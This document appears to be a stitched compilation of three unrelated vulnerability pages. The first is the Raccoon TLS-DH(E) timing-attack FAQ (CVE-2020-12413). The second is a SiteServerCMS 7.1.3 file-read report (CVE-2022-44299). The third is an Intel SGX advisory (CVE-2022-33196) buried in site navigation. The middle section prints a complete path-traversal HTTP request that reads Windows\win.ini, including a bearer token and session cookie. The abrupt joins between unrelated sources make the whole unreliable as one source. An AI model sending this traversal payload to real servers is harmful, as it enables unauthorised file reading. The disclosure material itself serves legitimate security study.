That is an excellent question that probably does not have a satisfying answer. Cryptographic(!) attacks against TLS generally tend to be not used a lot by real-world attackers as far as we know. The attacker needs particular circumstances for the Raccoon attack to work. He needs to be close to the target server to perform high precision timing measurements. He needs the victim connection to use DH(E) and the server to reuse ephemeral keys. And finally, the attacker needs to observe the original connection. For a real attacker, this is a lot to ask for. However, in comparison to what an attacker would need to do to break modern cryptographic primitives like AES, the attack does not look complex anymore. But still, a real-world attacker will probably use other attack vectors that are simpler and more reliable than this attack.

**Is my website vulnerable?**

It might be. You can check this using tools like:

*   www.ssllabs.com, your server might be vulnerable if "DH public server param (Ys) reuse" says "yes".
*   We will release our own tool very soon.

**Is my browser/client vulnerable?**

The vulnerability is not really a client-side vulnerability. The client can do nothing about this, except not to support DH(E) cipher suites. Modern browsers should not support these cipher suites anymore. As far as we know, Firefox was the last major browser that supported DHE, and dropped support for it in Firefox 78 in June 2020 (by now, most clients should run at least that version, if not later versions). You can check if your browser still supports DH(E) here, but to reiterate, there is nothing practical clients can or should do about the attack.

**Does Raccoon allow you to steal the private key?**

No, you have to perform the attack for each individual connection you want to attack.

**Is TLS 1.3 also affected?**

No. In TLS 1.3, the leading zero bytes are preserved for DHE cipher suites (as well as for ECDHE ones) and keys should not be reused. However, there exists a variant of TLS 1.3, which explicitly allows key reuse (or even encourages it), called ETS or eTLS. If ephemeral keys get reused in either variant, they could lead to micro-architectural side channels, which could be exploited, although leading zero bytes are preserved. We recommend not using these variants.

**Is ECDH also affected?**

Generally no. In TLS, the PMS's leading zero bytes are preserved in all versions of TLS for ECDH. So a secure, leak-free implementation should be possible. In other protocols, this might not be the case. To the best of our knowledge, even if side channels were present, the best currently known algorithms still require a lot more known bits to work for ECDH than what is possible to get with Raccoon. We still want to point out that the ECDH variant of the HNP has not been studied as extensively as the traditional HNP. Therefore, it cannot be guaranteed that future improvements to these algorithms might also make these attacks work for ECDH.

**Is DTLS affected?**

Yes.

**So is this really only a timing vulnerability?**

Sadly no. A bug in your software can also make this attack possible without timing measurements. We performed a large-scale Internet scan to analyze a large variety of TLS servers and found - surprise - several devices showing different behavior resulting from the first byte of the premaster secret. So far, we were able to identify and report one of them: an older version of F5 BIG-IP. You should probably check that you are not running a vulnerable configuration (see CVE-2020-5929) since this allows mounting a direct attack without complex timing measurements. If you are running a vulnerable configuration, you should probably patch now. Note that, also in the case of the vulnerable F5 BIG-IP, the attack is only practical if the server reuses DH public keys. We recommend not dismissing the ability of the attacker to measure precise timing, and instead move away from DHE for clients and avoid key reuse for servers.

**How common is DHE key reuse?**

We performed a measurement across the Alexa Top 100k websites on the Internet. 3.33% of those servers reused their ephemeral DH keys at least once. Springall et al. found that 4.4% of the Alexa Top 1M reused DH keys, as of 2016.

**Since when does the vulnerability exist?**

The vulnerability was undiscovered for more than 20 years (at least since SSLv3, published in 1996). The flaw was fixed for TLS 1.3 in draft-14, thanks to David Benjamin from Google who flagged this issue.

**Why wasn't this discovered earlier?**

The attack combines a lot of details of the involved primitives. The Hidden Number Problem (HNP), which we ultimately use to exploit the timing side channel, has never been used to exploit its original target (the Diffie-Hellman Key Exchange). That is because no one knew a technique to get the most significant bits of a Diffie-Hellman shared secret. Since then, the HNP was mostly used in other settings like DSA or ECDSA, and the knowledge that it also works for DH got forgotten. The fact that the leading zeros in the TLS-DH(E) premaster secrets are stripped is also a TLS detail that probably only a few people knew of.

**Why does TLS-DH(E) strip leading zero bytes in the first place?**

We found the answer to this question in an old Bugzilla entry. It seems like SSL 3 was supposed to implement PKCS#3, which mandates that leading zero bits of the PMS are preserved. But implementors misunderstood the wording in the spec of SSL 3:

> _A conventional Diffie-Hellman computation is performed. The negotiated key (Z) is used as the pre\_master\_secret \[...\]._

Instead, leading zero bytes were stripped. By the time this was discovered, the damage was already done. For TLS 1.0, it was then intentionally changed to remove leading zero bytes, probably to avoid further confusion. When elliptic curves were later added to the standard, they explicitly mentioned that the leading zeros of the PMS have to be preserved, resulting in the current situation where they are preserved for ECDH but not for DH.

**Why is the attack called "Raccoon"?**

Raccoon is not an acronym. Raccoons are just cute animals, and it is well past time that an attack will be named after them :)

**How have vendors responded to this vulnerability?**

*   F5 assigned the issue CVE-2020-5929. In particular, several F5 products allow executing a special version of the attack, without the need for precise timing measurements. F5 recommends their customers to patch the products or to enforce usage of fresh ephemeral keys. Please refer to the F5 Security Advisory.
*   OpenSSL assigned the issue CVE-2020-1968. OpenSSL does use fresh DH keys per default since version 1.0.2f (which made SSL\_OP\_SINGLE\_DH\_USE default as a response to CVE-2016-0701). Therefore, the attack mainly affects OpenSSL 1.0.2 when a DH certificate is in use, which is rare. OpenSSL 1.1.1 never reuses a DH secret and does not implement any "static" DH ciphersuites. To mitigate the attack, the developers moved all remaining DH cipher suites into the "weak-ssl-ciphers" list. In addition, motivated by this research, the developers also activated the fresh generation of EC ephemeral keys in OpenSSL 1.0.2w. Please refer to the OpenSSL Security Advisory.
*   Mozilla assigned the issue CVE-2020-12413. It has been solved by disabling DH and DHE cipher suites in Firefox (which was already planned before the Raccoon disclosure).
*   Microsoft assigned the issue CVE-2020-1596. Please refer to the Microsoft Security Response Center portal.

BearSSL and BoringSSL are not affected because they do not support DH(E) cipher suites. GnuTLS, Wolfssl, Botan, Mbed TLS and s2n do not support static DH cipher suites. Their DHE cipher suites never reuse ephemeral keys.

**I thought there was a security proof for TLS-DH(E) (here and here). Why wasn't this covered by the proof?**

A problem with a lot of current cryptographic proof techniques is that they are often **not designed to model side channels** (within the protocol). They will assume that all operations are always executed in constant time, although this might be impossible to achieve in practice. Additionally, they do not model the encoding of secrets within the primitives. These details get lost in the proven model of the protocol. To prove that TLS-DH(E) is secure, the PRF-ODH assumption had to be introduced, and the proof relied on this assumption to hold for TLS. In theory, this assumption is still fine for TLS, but for all practical means, the assumption does not hold in real TLS implementations.

**How is this attack related to other TLS attacks?**

Many of you would probably remember Bleichenbacher's attack (see also ROBOT for practical exploits). This adaptive chosen-ciphertext attack exploits server behavior differences by processing RSA PKCS#1 v1.5 messages. It allows the attacker to decrypt the premaster secret after a few thousands of connections. From the attacker model perspective, the Raccoon attack is very similar to Bleichenbacher's attack; the attacker also needs to send several modified ClientKeyExchange messages to the server, observe its responses, and perform some cryptographic computations to reveal the premaster secret. In contrast to Bleichenbacher's attack, Raccoon targets the DH key exchange.

Lucky 13 is another cool attack you might have in mind when reading the description of the Raccoon attack. In Lucky 13, AlFardan and Paterson exploited different timing behaviors of HMACs computed over different TLS record lengths. This allowed them to distinguish valid from invalid paddings and apply CBC padding oracle attacks. The attack works in a BEAST attack scenario and allows the attacker to decrypt TLS records. In contrast, our Raccoon attack exploits the timing behavior difference resulting from the HMAC computations over premaster secrets of different lengths. It reveals the premaster secret and thus decrypts the whole connection based on a single eavesdropped ClientKeyExchange message. Our Raccoon attack was inspired by the Lucky 13 side channel.

**What about other protocols?**

As you may imagine, there are many protocols using DH key exchange. For example, we can confirm that SSH does also strip leading zero bits. However, according to Springall et. al SSH does a better job at avoiding key reuse than TLS did, and therefore the attack is not exploitable in SSH.

XML Encryption and IPsec preserve leading zero bytes.

JSON Web Encryption only offers ECDH key agreement. The established shared secret should be processed as described in the NIST Special Publication 800-56A. This document recommends to preserve leading zero bytes, see Appendix C.1 and C.2.

There are many other protocols using DH key exchange. Their analysis is often hard since the documents do not provide information how to handle established shared secrets so that source code analysis or manual tests are necessary. It would also be interesting to see whether similar Raccoon-styled attacks would be applicable to the newest post quantum schemes.

**So is a protocol, which preserves leading zero bytes in the DH shared secret, completely secure against this attack?**

Our main attack relies on the TLS specification problem resulting from the stripped zeros. Executing a key derivation function over premaster secrets of different lengths leads to different timing behaviors. This is the side channel that showed to perform well in our measurements.

However, it is very likely that even if the shared secret preserves leading zero bytes, there could arise different side channels allowing the attacker to mount such an attack. Implementing a constant-time computation is very challenging; the side channel can arrise from the underlying big number library implementation or aligning shared secret to the modulus length. While such side channels are not as significant as the side channel described in our paper, a stronger attacker could still use powerful techniques like micro-architectural attacks to find out whether computed shared secrets start with zero or not.

**Is this vulnerability really serious enough to deserve a name, a logo and a web page?**

It is a vulnerability in the TLS specification, so we think...yes. In addition, it was fun to create them :)

**How can I contact you?**

You can contact us via mail or twitter:

*   Robert Merget, Ruhr University Bochum, @ic0nz1, \[email protected\]
*   Marcus Brinkmann, Ruhr University Bochum, @lambdafu, \[email protected\]
*   Nimrod Aviram, Tel Aviv University, @NimrodAviram, \[email protected\]
*   Juraj Somorovsky, Paderborn University, @jurajsomorovsky, \[email protected\]
*   Johannes Mittmann, Bundesamt für Sicherheit in der Informationstechnik (BSI)
*   Jörg Schwenk, Ruhr University Bochum, @JoergSchwenk, \[email protected\]

CVE-2020-12413: Raccoon Attack

SiteServerCMS 7.1.3 sscms has a file read vulnerability.

Vulnerability conditions  
SSCMS v7.1.3 +mysql+administrator privileges  
Vulnerability details

1.  Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=  
    An arbitrary file read vulnerability exists in the interface  
    code analysis process  
    \\SSCMS.Web\\Controllers\\Admin\\Cms\\Templates\\TemplatesAssetsEditorController.Get.cs  
    Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method

The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.  

Vulnerability verification  
An exp packet occurs after logging in to the background to obtain administrator credentials  
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826 Accept-Encoding: gzip

CVE-2022-44299: background file reading · Issue #3491 · siteserver/cms

Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2023.1 IPU - Intel® Xeon® Processor Advisory**

**Summary: **

A potential security vulnerability in some Intel® Xeon® Processors with Intel® Software Guard Extensions (SGX) may allow escalation of privilege.  Intel is releasing firmware updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-33196

Description: Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access. 

CVSS Base Score:  7.2 High

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N  
 

**Affected Products:**

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

3rd Gen Intel® Xeon® Scalable Processor family

Server

606A6

0x87

Intel® Xeon® D Processors

Server

606C1

01

**Recommendations:  
**

Intel is releasing BIOS and microcode updates for the affected processors.

For the mitigation to be effective for Intel® SGX enabled systems, Intel recommends updating the microcode patch located in platform flash designated by firmware interface table (FIT) entry type1.

Details on the microcode loading points can be found at:

https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/secure-coding/loading-microcode-os.html

When the microcode update is applied via the FIT table the BIOS must also be updated.  If the BIOS is not updated to the latest version with the microcode update when Intel® SGX is enabled, the system will hang. Loading this microcode update via the operating system is acceptable but will not provide the mitigation for this Intel® SGX issue.

For non Intel® (SGX) systems the microcode patch can be OS loaded.

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode: 

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

This CVE requires a Microcode Security Version Number (SVN) update. To address this vulnerability, a SGX TCB recovery is planned, refer here for more information on the SGX TCB recovery process.

**Acknowledgements:**

This issue was found internally by Intel employees in collaboration with external researchers from Google.

Intel would like to thank Cfir Cohen, Erdem Aktas, Felix Wilhelm, James Forshaw and Josh Eads from Google.

Intel would like to thank Nagaraju Kodalapura Nagabhushana Rao, Przemyslaw Duda, Liron Shacham and Ron Anderson from Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

1.1

02/15/2023

Updated Recommendations

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#firefox